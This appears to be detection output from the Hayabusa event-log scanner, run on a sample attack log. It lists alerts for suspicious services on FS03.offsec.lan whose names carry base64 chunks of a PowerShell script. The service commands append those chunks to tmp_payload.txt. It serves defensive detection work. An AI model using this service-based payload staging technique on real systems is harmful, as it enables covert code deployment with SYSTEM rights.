+2021-11-03 17:17:37.845 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAkT1MgPSAoR2V0LVdtaU9iamVjdCBXaW4zMl9PcGVyYXRpbmdTeXN0ZW0gLWNvbXB1dGVybmFtZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:37.845 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAkT1MgPSAoR2V0LVdtaU9iamVjdCBXaW4zMl9PcGVyYXRpbmdTeXN0ZW0gLWNvbXB1dGVybmFtZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:37.845 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAkT1MgPSAoR2V0LVdtaU9iamVjdCBXaW4zMl9PcGVyYXRpbmdTeXN0ZW0gLWNvbXB1dGVybmFtZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:39.282 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkKS5DYXB0aW9uDQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiJE9TIg0KICAgICAgICAgICAgfQ0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:39.282 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AkQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkKS5DYXB0aW9uDQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiJE9TIg0KICAgICAgICAgICAgfQ0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:39.282 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkKS5DYXB0aW9uDQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiJE9TIg0KICAgICAgICAgICAgfQ0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:40.731 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRMT0NBTEhPU1RfT1BUKSB7DQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiR2V0dGluZyBPUyBJbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:40.731 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRMT0NBTEhPU1RfT1BUKSB7DQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiR2V0dGluZyBPUyBJbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:40.731 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRMT0NBTEhPU1RfT1BUKSB7DQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiR2V0dGluZyBPUyBJbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:42.184 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Zvcm1hdGlvbiBmb3IgJENvbXB1dGVyIg0KICAgICAgICAgICAgICAgICRPUyA9IChHZXQtV21pT2JqZWN0IFdpbjMyX09wZXJhdGluZ1N5c3RlbSkuQ2FwdGlvbg0KICAgICAgICAgICAgICAgIFdy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:42.184 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Zvcm1hdGlvbiBmb3IgJENvbXB1dGVyIg0KICAgICAgICAgICAgICAgICRPUyA9IChHZXQtV21pT2JqZWN0IFdpbjMyX09wZXJhdGluZ1N5c3RlbSkuQ2FwdGlvbg0KICAgICAgICAgICAgICAgIFdy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:42.184 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Zvcm1hdGlvbiBmb3IgJENvbXB1dGVyIg0KICAgICAgICAgICAgICAgICRPUyA9IChHZXQtV21pT2JqZWN0IFdpbjMyX09wZXJhdGluZ1N5c3RlbSkuQ2FwdGlvbg0KICAgICAgICAgICAgICAgIFdy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:43.623 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgaWYgKCRDb21wdXRlckxpc3RUeXBlIC1lcSAkRE9NQUlOX09QVCkgew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:43.623 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: aXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgaWYgKCRDb21wdXRlckxpc3RUeXBlIC1lcSAkRE9NQUlOX09QVCkgew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:43.623 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgaWYgKCRDb21wdXRlckxpc3RUeXBlIC1lcSAkRE9NQUlOX09QVCkgew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:45.063 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAjJE9TID0gKEdldC1XbWlPYmplY3QgV2lu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:45.063 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAjJE9TID0gKEdldC1XbWlPYmplY3QgV2lu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:45.063 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAjJE9TID0gKEdldC1XbWlPYmplY3QgV2lu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:46.517 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MzJfT3BlcmF0aW5nU3lzdGVtIC1jb21wdXRlcm5hbWUgJENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuQ2FwdGlvbg0KDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:46.517 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MzJfT3BlcmF0aW5nU3lzdGVtIC1jb21wdXRlcm5hbWUgJENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuQ2FwdGlvbg0KDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:46.517 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MzJfT3BlcmF0aW5nU3lzdGVtIC1jb21wdXRlcm5hbWUgJENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuQ2FwdGlvbg0KDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:48.122 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: N0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJsZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IERO | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:48.122 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: N0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJsZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IERO | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:48.122 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: N0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJsZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IERO | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:49.575 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: U0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCg0KICAgICAgICAgICAgICAgICMkR2V0QURPUyA9IEdldC1BRENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCAtRmlsdGVyIHtlbmFibG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:49.575 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: U0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCg0KICAgICAgICAgICAgICAgICMkR2V0QURPUyA9IEdldC1BRENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCAtRmlsdGVyIHtlbmFibG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:49.575 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: U0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCg0KICAgICAgICAgICAgICAgICMkR2V0QURPUyA9IEdldC1BRENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCAtRmlsdGVyIHtlbmFibG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:51.015 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VkIC1lcSAidHJ1ZSJ9IC1Qcm9wZXJ0aWVzIE9wZXJhdGluZ1N5c3RlbSB8IFNlbGVjdCANCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAjJENvbXB1dGVyTGlzdCA9ICRHZXRBRENv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:51.015 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VkIC1lcSAidHJ1ZSJ9IC1Qcm9wZXJ0aWVzIE9wZXJhdGluZ1N5c3RlbSB8IFNlbGVjdCANCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAjJENvbXB1dGVyTGlzdCA9ICRHZXRBRENv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:51.015 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VkIC1lcSAidHJ1ZSJ9IC1Qcm9wZXJ0aWVzIE9wZXJhdGluZ1N5c3RlbSB8IFNlbGVjdCANCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAjJENvbXB1dGVyTGlzdCA9ICRHZXRBRENv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:52.463 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bXB1dGVyTGlzdC5ETlNIb3N0TmFtZQ0KDQoNCiAgICAgICAgICAgICAgICAkT1MgPSAoJEdldEFEQ29tcHV0ZXJMaXN0IC1tYXRjaCAkQ29tcHV0ZXIpLk9wZXJhdGluZ1N5c3RlbQ0KICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:52.463 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bXB1dGVyTGlzdC5ETlNIb3N0TmFtZQ0KDQoNCiAgICAgICAgICAgICAgICAkT1MgPSAoJEdldEFEQ29tcHV0ZXJMaXN0IC1tYXRjaCAkQ29tcHV0ZXIpLk9wZXJhdGluZ1N5c3RlbQ0KICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:52.463 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bXB1dGVyTGlzdC5ETlNIb3N0TmFtZQ0KDQoNCiAgICAgICAgICAgICAgICAkT1MgPSAoJEdldEFEQ29tcHV0ZXJMaXN0IC1tYXRjaCAkQ29tcHV0ZXIpLk9wZXJhdGluZ1N5c3RlbQ0KICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:53.917 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:53.917 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:53.917 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:55.362 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgQXBwbGljYXRpb24gRXZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRBcHBsaWNhdGlvbk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
